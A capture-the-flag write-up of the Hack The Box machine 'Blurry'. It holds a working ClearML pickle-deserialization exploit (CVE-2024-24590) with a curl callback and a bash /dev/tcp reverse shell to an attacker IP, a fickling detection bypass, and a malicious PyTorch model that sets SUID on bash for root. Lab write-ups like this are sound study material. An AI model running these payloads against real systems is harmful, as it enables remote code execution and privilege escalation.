
Blurry Writeup

Machine Info

Machine Description

Name: Blurry
OS: Linux
Difficulty: Medium
Author: C4rm3l0

Recon

Service Scan

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.5.90
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 21:38 EST
Nmap scan report for 10.129.5.90
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.53 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ sudo nmap -p22,80 -sCV 10.129.5.90
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 21:43 EST
Nmap scan report for 10.129.5.90
Host is up (0.063s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

The scan shows two open ports, SSH and HTTP. The OS is Debian, and the web service sits behind an Nginx reverse proxy that redirects requests to the bare IP to app.blurry.htb, so I add the domain to /etc/hosts.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ echo "10.129.5.90 blurry.htb app.blurry.htb" | sudo tee -a /etc/hosts
10.129.5.90 blurry.htb app.blurry.htb

Before browsing the site, I first try the hostname without the subdomain and find that Nginx still redirects to app.blurry.htb.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Blurry]
└─$ curl -svI -o /dev/null http://blurry.htb
* Host blurry.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.129.5.90
*   Trying 10.129.5.90:80...
* Connected to blurry.htb (10.129.5.90) port 80
* using HTTP/1.x
> HEAD / HTTP/1.1
> Host: blurry.htb
> User-Agent: curl/8.11.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.18.0
< Date: Tue, 03 Dec 2024 03:02:04 GMT
< Content-Type: text/html
< Content-Length: 169
< Connection: keep-alive
< Location: http://app.blurry.htb/
<
* Connection #0 to host blurry.htb left intact

HTTP - app.blurry.htb

The homepage hosts the open-source project ClearML. When typing into the "Full Name" field, three names appear besides the default user:

  • Chad Jippity
  • Ray Flection
  • Car Melo

I pick Default User first, enter ClearML and click "Getting Started", which explains how to install and use ClearML. After installing the tool I click "CREATE NEW CREDENTIALS", but nothing gets generated, so I switch to Ray Flection's account to look around. Clicking the avatar in the top-right corner and going to "Settings > Workspace > + Create new credentials" produces a new key pair, which I add to my local configuration.

Configure ClearML locally:

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ uv tool install clearml
...
Installed 4 executables: clearml-data, clearml-init, clearml-param-search, clearml-task

┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ clearml-init
/home/kali/.local/share/uv/tools/clearml/lib/python3.12/site-packages/clearml/task.py:258: SyntaxWarning: invalid escape sequence '\<'
  """
/home/kali/.local/share/uv/tools/clearml/lib/python3.12/site-packages/clearml/storage/manager.py:217: SyntaxWarning: invalid escape sequence '\~'
  """
ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:
api {
    web_server: http://app.blurry.htb
    api_server: http://api.blurry.htb
    files_server: http://files.blurry.htb
    credentials {
        "access_key" = "80OD10WLSCJZEOYVN2J1"
        "secret_key"  = "yr0iDqhniWGrG85HonblNikDbeh3nAHg0h3hpXHCQ09BMzdiTc"
    }
}
Detected credentials key="80OD10WLSCJZEOYVN2J1" secret="yr0i***"

ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb

Verifying credentials ...
Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NameResolutionError("<urllib3.connection.HTTPConnection object at 0x7f3a0a1dbc80>: Failed to resolve 'api.blurry.htb' ([Errno -2] Name or service not known)")': /auth.login
Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'NameResolutionError("<urllib3.connection.HTTPConnection object at 0x7f3a0a1d8ec0>: Failed to resolve 'api.blurry.htb' ([Errno -2] Name or service not known)")': /auth.login
Error: could not verify credentials: key=80OD10WLSCJZEOYVN2J1 secret=yr0iDqhniWGrG85HonblNikDbeh3nAHg0h3hpXHCQ09BMzdiTc
...

Along the way two new subdomains show up: api.blurry.htb and files.blurry.htb. Since they are not yet in /etc/hosts, the tool cannot resolve them, so I add them to the hosts file and run the setup again.

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ cat /etc/hosts
...
10.129.5.90 blurry.htb app.blurry.htb api.blurry.htb files.blurry.htb

┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ clearml-init
ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:
api {
    web_server: http://app.blurry.htb
    api_server: http://api.blurry.htb
    files_server: http://files.blurry.htb
    credentials {
        "access_key" = "80OD10WLSCJZEOYVN2J1"
        "secret_key"  = "yr0iDqhniWGrG85HonblNikDbeh3nAHg0h3hpXHCQ09BMzdiTc"
    }
}
Detected credentials key="80OD10WLSCJZEOYVN2J1" secret="yr0i***"

ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb

Verifying credentials ...
Credentials verified!

New configuration stored in /home/kali/clearml.conf
ClearML setup completed successfully.

Setup succeeds.
I don't yet know how to make use of ClearML, so I decide to scan for other subdomains first; three have already turned up, so there may be more I haven't collected, and since the target runs Nginx, the odds of additional vHosts are decent. If nothing new is found, I'll start hunting for ClearML vulnerabilities.

Subdomain Enumeration

The scan reveals a new vhost: chat.blurry.htb

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ ffuf -u http://10.129.5.90 -H "Host: FUZZ.blurry.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fc 301

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.5.90
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.blurry.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

app                     [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 71ms]
files                   [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 1962ms]
chat                    [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 160ms]
:: Progress: [114441/114441] :: Job [1/1] :: 641 req/sec :: Duration: [0:03:06] :: Errors: 0 :

So I add it to /etc/hosts as well.

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/clearML]
└─$ cat /etc/hosts
...
10.129.5.90 blurry.htb app.blurry.htb api.blurry.htb files.blurry.htb chat.blurry.htb

HTTP - chat.blurry.htb

The homepage is an open-source chat platform, Rocket.Chat, but I cannot log in for now.

ClearML

Back in ClearML, the homepage lists a recent project, "Black Swan". Opening it and switching to the EXPERIMENTS tab shows that Chad Jippity runs "Review JSON Artifacts" every few minutes.

Clicking into that job and its task reveals that Chad Jippity is actually running review_tasks.py every few minutes.

Skimming review_tasks.py shows that the script fetches the "Artifacts" of every task tagged "review".

Artifacts1 are objects associated with ClearML tasks that are logged to ClearML, so they can later be easily accessed, modified, and used.
In short, artifacts are objects used to store models or other task-related objects.
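For reference, a minimal sketch of logging an artifact and reading it back with the SDK (the project and task names here are illustrative, not taken from the box):

#!/usr/bin/python3
# Sketch of the artifact API described above (illustrative project/task names).
from clearml import Task

# Script A: log a JSON-style artifact on a task
task = Task.init(project_name="demo-project", task_name="demo-task")
task.upload_artifact(name="stats", artifact_object={"samples": 64}, wait_on_upload=True)
task.close()

# Script B (later): look the task up again and fetch the artifact back
other = Task.get_task(project_name="demo-project", task_name="demo-task")
print(other.artifacts["stats"].get())  # -> {'samples': 64}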

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")

def process_task(task):
    artifacts = task.artifacts

    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()

        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

def main():
    review_task = Task.init(project_name="Black Swan", 
                            task_name="Review JSON Artifacts", 
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return

    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)
...
if __name__ == "__main__":
    main()
    cleanup()

CVE-2024-24590

Searching for "clearml artifact exploit" immediately points to CVE-2024-24590. I could simply fire off a public PoC from GitHub, but that would take the fun out of it; since this is an open-source project, I'd rather see what is actually going on.

See HiddenLayer's research report for detailed reproduction steps and an introduction to ClearML.

Understanding the Pickle Deserialization Vulnerability

Clicking the avatar in the top-right corner of ClearML and opening "Profile" shows the version in the bottom-right corner: "WebApp: 1.13.1-426 • Server: 1.13.1-426 • API: 2.27". So I browse the source for that version and inspect artifacts.py.

The top of the source shows that artifacts.py imports pickle. pickle is a Python module that provides protocols for (de)serializing Python objects, but its deserialization is unsafe: an attacker can forge malicious pickle data that executes arbitrary code during unpickling (pickle.loads()2).

import gzip
import io
import json
import yaml
import mimetypes
import os
import pickle
from six.moves.urllib.parse import quote
from copy import deepcopy
from datetime import datetime
from multiprocessing.pool import ThreadPool
from tempfile import mkdtemp, mkstemp
from threading import Thread
from time import time
from zipfile import ZipFile, ZIP_DEFLATED

review_tasks.py中,為了取得artifact的資料,使用data = artifact_object.get(),因此從artifacts.py往下看,尋找class Artifact(object)get function,因此找到def get(self, force_download=False, deserialization_function=None)的區塊,並尤其針對對pickel的部分分析。

def get(self, force_download=False, deserialization_function=None):
...
    if self._object is not self._not_set:
        return self._object

    local_file = self.get_local_copy(raise_on_error=True, force_download=force_download)

    # noinspection PyBroadException
    try:
        if deserialization_function:
            with open(local_file, "rb") as f:
                self._object = deserialization_function(f.read())
    ...
        elif self.type == "image":
            self._object = Image.open(local_file)
        elif self.type == "JSON" or self.type == "dict":
            with open(local_file, "rt") as f:
                if self.type == "JSON" or self._content_type == "application/json":
                    self._object = json.load(f)
                else:
                    self._object = yaml.safe_load(f)
        elif self.type == "string":
            with open(local_file, "rt") as f:
                self._object = f.read()
        elif self.type == "pickle":
            with open(local_file, "rb") as f:
                self._object = pickle.load(f)
    except Exception as e:
        LoggerRoot.get_base_logger().warning(
            "Exception '{}' encountered when getting artifact with type {} and content type {}".format(
                e, self.type, self._content_type
            )
        )

The source shows that when fetching artifact data, the function first checks the data type, and if the type is pickle it simply calls pickle.load(). If we can control local_file, we can execute arbitrary code.
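To make the risk concrete, here is a minimal sketch in plain Python (not ClearML code) showing how a crafted pickle runs a command the moment it is deserialized:

#!/usr/bin/python3
# Minimal demo: __reduce__ tells pickle how to "rebuild" the object,
# so unpickling attacker-controlled data calls os.system directly.
import os
import pickle

class Evil:
    def __reduce__(self):
        return (os.system, ("id",))

blob = pickle.dumps(Evil())   # what an attacker would plant as the artifact file
pickle.loads(blob)            # deserializing it immediately runs `id`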

Next, look at the fix commit in v1.14.3rc0: before handing the data to pickle, the patch checks the artifact file's hash, and if it differs from the original file's hash, the artifact has been tampered with.

        elif self.type == "image":
            self._object = Image.open(local_file)
        elif self.type == "JSON" or self.type == "dict":
            with open(local_file, "rt") as f:
                if self.type == "JSON" or self._content_type == "application/json":
                    self._object = json.load(f)
                else:
                    self._object = yaml.safe_load(f)
        elif self.type == "string":
            with open(local_file, "rt") as f:
                self._object = f.read()
        elif self.type == "pickle":
            if self.hash:
                file_hash, _ = sha256sum(local_file, block_size=Artifacts._hash_block_size)
                if self.hash != file_hash:
                    raise Exception("incorrect pickle file hash, artifact file might be corrupted")
            with open(local_file, "rb") as f:
                self._object = pickle.load(f)
    except Exception as e:
        LoggerRoot.get_base_logger().warning(
            "Exception '{}' encountered when getting artifact with type {} and content type {}".format(
                e, self.type, self._content_type
            )
        )

Crafting the Payload by Hand

Although I've been calling items like "Review JSON Artifacts" tasks, they are actually ClearML "Experiments", and each experiment can hold multiple tasks. You can follow the official tutorial video3 to upload an experiment.
(The clearml-init CLI setup was already done at the very beginning, so I won't repeat it.)

Searching for "clearml artifact upload" turns up the official Using Artifacts tutorial, which shows that Task.upload_artifact() uploads artifacts. To force ClearML to use pickle, set auto_pickle to True4; add a pickle payload5 and the following PoC comes out.

#!/usr/bin/python3

from clearml import Task
import pickle

class CMD:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://10.10.14.6:8000/qq",))

def main():
    cmd = CMD()
    task = Task.init(project_name="Black Swan", task_name="test", tags=["review"])
    res = task.upload_artifact(name="test", artifact_object=cmd, auto_pickle=True)

if __name__ == "__main__":
    main()

Testing indeed produces a callback to my HTTP server.

Getting a Reverse Shell

After uploading the experiment and waiting about three minutes, a reverse shell connects back.
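Before this run I swapped the curl callback in the PoC above for a reverse shell; a minimal sketch of the modified script, assuming a plain bash reverse shell (the IP and port match the nc listener below):

#!/usr/bin/python3
# Same PoC as above, with the payload swapped for a reverse shell
# (10.10.14.6:8787 are my attacker IP and listener port).

from clearml import Task

class CMD:
    def __reduce__(self):
        import os
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/10.10.14.6/8787 0>&1'",))

def main():
    task = Task.init(project_name="Black Swan", task_name="test", tags=["review"])
    task.upload_artifact(name="test", artifact_object=CMD(), auto_pickle=True)

if __name__ == "__main__":
    main()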

Terminal
┌──(kali㉿kali)-[~/…/HTB/Machines/Blurry/playground]
└─$ nc -lvnp 8787
listening on [any] 8787 ...

id
connect to [10.10.14.6] from (UNKNOWN) [10.129.5.90] 43824
bash: cannot set terminal process group (50361): Inappropriate ioctl for device
bash: no job control in this shell
jippity@blurry:~$
jippity@blurry:~$ id
uid=1000(jippity) gid=1000(jippity) groups=1000(jippity)
jippity@blurry:~$ cat user.txt
cat user.txt
d68f1ded19ba45f4a4987038d1089fc5

While I'm here, I drop my SSH public key into ~/.ssh/authorized_keys for easier access.

Terminal
jippity@blurry:~$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILrTGODhENPkBXJ9xtQwpB2jFCzO6943sy9z0szU7bji kali@kali" >>  ~/.ssh/authorized_keys

SSH Login as jippity

Log in as jippity over SSH. As usual, try one of the standard Linux privilege-escalation checks: sudo -l. It turns out I can run /usr/bin/evaluate_model as root against any .pth file under /models/, so let's first see what kind of file evaluate_model is.

Terminal
jippity@blurry:~$ sudo -l
sudo -l
Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
jippity@blurry:~$

Analyzing the evaluate_model Script

file tells us evaluate_model is an ASCII text executable, i.e. a script.

jippity@blurry:~$ file /usr/bin/evaluate_model
file /usr/bin/evaluate_model
/usr/bin/evaluate_model: Bourne-Again shell script, ASCII text executable

Reading through it, the script first screens the model archive and then decides whether to run the model. Roughly:

  1. Extract the model archive (lines 19-28)
  2. Run fickling on each extracted .pkl file, i.e. the pickled model data (lines 30-38)
  3. If the analysis comes back clean, hand the model to another Python script, /models/evaluate_model.py (lines 43-46)
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/opt/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi

Analyzing the evaluate_model.py Script

Next, reading evaluate_model.py shows it is the script that actually runs the PyTorch model. The important part is load_model(model_path) (lines 29-36), which is where the model is really loaded; line 32 calls torch.load(model_path). The official documentation says this is the PyTorch function that deserializes with pickle6, and it warns that the function relies on the unsafe pickle module.

import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys


class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x


def load_model(model_path):
    model = CustomCNN()

    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)

    model.eval()
    return model

def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])

    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader

def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()

    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')

def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1]  # Path to the .pth file
        main(model_path)

Crafting the Payload by Hand

From the script analysis above, a successful privilege escalation needs to:

  1. Provide a file in a supported archive format (the model archive)
  2. Evade fickling's detection
  3. Use a PyTorch model to trigger the malicious pickle

fickling's Weak Detection

First check the fickling version: 0.1.2. Then go to the matching release on GitHub and read the source.

Terminal
jippity@blurry:~$ fickling -v
fickling -v
0.1.2

analysis.py裡得知,fickling只針對eval()exec()compile()open()_run_code()execWrapper()的關鍵字過濾,所以可以放心使用os.system()

class OvertlyBadEvals(Analysis):
    def analyze(self, context: AnalysisContext) -> Iterator[AnalysisResult]:
        for node in context.pickled.properties.non_setstate_calls:
            if (
                hasattr(node.func, "id")
                and node.func.id in context.pickled.properties.likely_safe_imports
            ):
                # if the call is to a constructor of an object imported from the Python
                # standard library, it's probably okay
                continue
            shortened, already_reported = context.shorten_code(node)
            if (
                shortened.startswith("eval(")
                or shortened.startswith("exec(")
                or shortened.startswith("compile(")
                or shortened.startswith("open(")
                or shortened.startswith("_run_code(")
                or shortened.startswith("execWrapper(")
            ):
...

Testing it with whoami, fickling shows no warning at all.
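The test file was presumably built along these lines (a sketch; the os.system call and the "whoami" string match the bytes visible in the dump below):

#!/usr/bin/python3
# Sketch: write a pickle that calls os.system("whoami") via __reduce__,
# i.e. the kind of payload the wrapper script feeds to fickling.
import os
import pickle

class CMD:
    def __reduce__(self):
        return (os.system, ("whoami",))

with open("pickled.pkl", "wb") as f:
    pickle.dump(CMD(), f)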

Terminal
jippity@blurry:~$ cat pickled.pkl
!posixsystemwhoamiR.jippity@blurry:~$
jippity@blurry:~$ fickling -s --json-output res.json pickled.pkl && cat res.json
jippity@blurry:~$

Building a Malicious PyTorch Model Archive

First confirm the PyTorch version on the target: 2.2.0. Basically any version from this one onward will do.

Terminal
jippity@blurry:~$ pip list
pip list
Package                   Version
------------------------- --------------
...
torch                     2.2.0
torchvision               0.17.0
triton                    2.2.0
typing-extensions         4.9.0
urllib3                   1.26.5
wheel                     0.34.2

Next, a quick search for "pytorch model template pickle" leads straight to the official PyTorch tutorial "Saving and Loading Models". I copy the first example and modify it, adding a __reduce__() that fires during unpickling.

import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim


# Define model
class TheModelClass(nn.Module):
    def __init__(self):
        super(TheModelClass, self).__init__()
        self.conv1 = nn.Conv2d(3, 6, 5)
        self.pool = nn.MaxPool2d(2, 2)
        self.conv2 = nn.Conv2d(6, 16, 5)
        self.fc1 = nn.Linear(16 * 5 * 5, 120)
        self.fc2 = nn.Linear(120, 84)
        self.fc3 = nn.Linear(84, 10)

    def forward(self, x):
        x = self.pool(F.relu(self.conv1(x)))
        x = self.pool(F.relu(self.conv2(x)))
        x = x.view(-1, 16 * 5 * 5)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.fc3(x)
        return x

    def __reduce__(self):
        import os
        return (os.system, ("chmod u+s /bin/bash",))


# Initialize model
model = TheModelClass()

# Initialize optimizer
optimizer = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)

# Print model's state_dict
print("Model's state_dict:")
for param_tensor in model.state_dict():
    print(param_tensor, "\t", model.state_dict()[param_tensor].size())

# Print optimizer's state_dict
print("Optimizer's state_dict:")
for var_name in optimizer.state_dict():
    print(var_name, "\t", optimizer.state_dict()[var_name])

torch.save(model.state_dict(), "./badmodel.pth")

Set up the environment and run the script above to produce the malicious model archive badmodel.pth; the archive is actually a ZIP file.

Terminal
test-py on  master [?] via 🐍 v3.13.0
❯ uv venv --python 3.9
Using CPython 3.9.20
Creating virtual environment at: .venv
Activate with: source .venv/bin/activate.fish

test-py on  master [?] via 🐍 v3.13.0
source .venv/bin/activate.fish

test-py on  master [?] via 🐍 v3.9.20 (test-py)
❯ uv init --no-cache
Initialized project `test-py`

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ uv add torch --no-cache
...
test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ python badtorch.py
/var/home/user/Documents/tmp/test-py/.venv/lib/python3.9/site-packages/torch/_subclasses/functional_tensor.py:295: UserWarning: Failed to initialize NumPy: No module named 'numpy' (Triggered internally at ../torch/csrc/utils/tensor_numpy.cpp:84.)
  cpu = _conversion_method_template(device=torch.device("cpu"))

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ uv add numpy
Resolved 26 packages in 525ms
Prepared 1 package in 1.24s
Installed 1 package in 12ms
 + numpy==2.0.2

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ python badtorch.py

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ file badmodel.pth
badmodel.pth: Zip archive data, at least v0.0 to extract, compression method=store

test-py on  master [?] is 📦 v0.1.0 via 🐍 v3.9.20 (test-py)
❯ scp badmodel.pth [email protected]:"/home/kali/Documents/CTF/HTB/Machines/Blurry/"
[email protected]'s password:
badmodel.pth                                                                              100%  246KB 156.6MB/s   00:00
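
As a sanity check, listing the .pth can confirm it contains a pickle for evaluate_model's find/fickling step to scan (a sketch; the exact member prefix depends on PyTorch's zip serialization format):

#!/usr/bin/python3
# Sketch: list the .pth (really a ZIP) to confirm it contains a data.pkl
# that fickling will analyze; member names follow PyTorch's zip format.
import zipfile

with zipfile.ZipFile("badmodel.pth") as z:
    for name in z.namelist():
        print(name)   # e.g. badmodel/data.pkl, badmodel/data/0, badmodel/version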

ROOTED

Upload it, run it, and get root.

Terminal
jippity@blurry:~$ cp badmodel.pth /models/
jippity@blurry:~$ sudo /usr/bin/evaluate_model /models/badmodel.pth
[+] Model /models/badmodel.pth is considered safe. Processing...
Traceback (most recent call last):
  File "/models/evaluate_model.py", line 76, in <module>
    main(model_path)
  File "/models/evaluate_model.py", line 65, in main
    model = load_model(model_path)
  File "/models/evaluate_model.py", line 33, in load_model
    model.load_state_dict(state_dict)
  File "/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py", line 2153, in load_state_dict
    raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format(
RuntimeError: Error(s) in loading state_dict for CustomCNN:
        Unexpected key(s) in state_dict: "fc3.weight", "fc3.bias".
        size mismatch for conv1.weight: copying a param with shape torch.Size([6, 3, 5, 5]) from checkpoint, the shape in current model is torch.Size([16, 3, 3, 3]).
        size mismatch for conv1.bias: copying a param with shape torch.Size([6]) from checkpoint, the shape in current model is torch.Size([16]).
        size mismatch for conv2.weight: copying a param with shape torch.Size([16, 6, 5, 5]) from checkpoint, the shape in current model is torch.Size([32, 16, 3, 3]).
        size mismatch for conv2.bias: copying a param with shape torch.Size([16]) from checkpoint, the shape in current model is torch.Size([32]).
        size mismatch for fc1.weight: copying a param with shape torch.Size([120, 400]) from checkpoint, the shape in current model is torch.Size([128, 2048]).
        size mismatch for fc1.bias: copying a param with shape torch.Size([120]) from checkpoint, the shape in current model is torch.Size([128]).
        size mismatch for fc2.weight: copying a param with shape torch.Size([84, 120]) from checkpoint, the shape in current model is torch.Size([10, 128]).
        size mismatch for fc2.bias: copying a param with shape torch.Size([84]) from checkpoint, the shape in current model is torch.Size([10]).
jippity@blurry:~$ bash -p
bash-5.1# id
uid=1000(jippity) gid=1000(jippity) euid=0(root) groups=1000(jippity)
bash-5.1# cat /root/root.txt
e55eed74ef76299b9152bb4b5d253bcf

Postscript

Only after reading other people's writeups did I learn that you can freely register a Rocket.Chat account and log in; the chat rooms inside contain hints about ClearML.
Hilarious.


Last update: 2024-12-23 Created: 2024-12-03